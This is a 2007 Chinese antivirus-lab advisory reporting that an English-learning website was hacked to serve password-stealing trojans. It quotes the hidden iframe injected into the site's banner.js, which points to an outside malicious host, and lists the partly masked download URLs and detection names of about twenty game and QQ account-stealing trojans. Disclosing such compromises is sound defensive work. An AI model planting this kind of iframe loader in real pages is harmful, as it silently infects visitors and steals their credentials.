出处:安天实验室 2007-11-13 11:00
11月13日,安天实验室反病毒监测网发现,搜英语网站 (www.soeng****.com.cn)被黑客 植入病毒,用户如果访问该网站,会被病毒感染。系统就会自动从恶意网站上下载并运行多个 恶意程序,大多为游戏木马!盗取用户敏感信息。 该网站的主页里的banner.js脚本里被插入如下框架代码: 框架代码: <iframe src="http://5.xqhgm.com/mian7.htm" width="20" height="0" frameborder="0"></iframe>。 http://5.xq***.com/mian7.htm里被插入挂马代码: 这几个挂马地址全部被隐藏了,所以无法截图。 当用户访问www.soeng****.com.cn时,系统会自动隐藏下载以下病毒文件: http://5.xq***.com/down/a.exe 病毒名:(Trojan-Downloader.Win32.Losabel.n) 下载者木马 一旦运行该木马将下载以下病毒到用户的系统,并运行。 http://1.exi****.com/1.exe 病毒名:( ) 地址失效 http://1.exi****.com/2.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.gub) 游戏盗号木马 http://1.exi****.com/3.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.hnt) 盗号木马 http://1.exi****1.com/4.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.gth) 盗号木马 http://1.exi****.com/5.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.hng) 游戏盗号木马 http://1.exi****.com/6.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.hho) 游戏盗号木马 http://1.exi****.com/7.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.hni) 盗号木马 http://1.exi****.com/8.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.grr) 盗号木马 http://1.eexi****.com/9.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.hle) 游戏木马 http://1.exi****.com/10.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.gti) 游戏木马 http://1.exi****.com/11.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.guz) 游戏盗号木马 http://1.exi****.com/12.exe 病毒名:(Trojan-PSW.Win32.QQPass.ali) QQ木马 http://1.exi****.com/13.exe 病毒名:(Trojan-PSW.Win32.Lmir.boq) 游戏木马 http://1.exi****.com/14.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.fxk) 游戏盗号木马 http://1.exi****.com/15.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.gww) 游戏木马 http://1.exi****.com/16.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.hjn) 游戏盗号木马 http://1.exi****.com/17.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.gyu) 游戏木马 http://1.exi****.com/18.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.hde) 游戏木马 http://1.exi****1.com/19.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.hmb) 游戏木马 http://1.exi****.com/20.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.hjt) 游戏木马 http://1.exi****.com/21.exe 病毒名:(Trojan-PSW.Win32.OnLineGames.fwl) 游戏木马 http://1.exi****.com/22.exe 病毒名:( ) 地址无效
点击此处下载木马防线2005+
病毒上报信箱: submit@virusview.net
内容:
病毒上报信箱: